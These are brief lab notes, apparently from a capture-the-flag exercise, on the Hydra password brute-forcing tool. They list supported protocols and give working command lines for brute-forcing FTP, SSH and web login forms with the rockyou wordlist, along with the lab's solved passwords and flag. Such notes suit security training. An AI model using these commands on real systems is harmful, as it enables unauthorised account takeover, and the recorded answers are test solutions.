Hydra

Hydra is a brute force online password cracking program

Hydra has the ability to bruteforce the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Commands FTP: hydra -l -P <passlist.txt> ftp://machine_IP

SSH: hydra -l -P <passlist.txt> machine_IP -t 4 ssh -t: number of threads

POST web form hydra -l -P <passlist.txt> machine_IP http-post-form ”/:username=^USER^&password=^PASS^:F=incorrect” -V F=incorrect - if this word appears on the page it is incorrect -V - verbose / - login url

web form: hydra -l molly -P rockyou.txt machine_IP http-post-form “/login:username=^USER^&password=^PASS^:F=incorrect” -V result: sunshine

ssh: hydra -l molly -P rockyou.txt machine_IP -t 4 ssh result: butterfly ls cat flag2.txt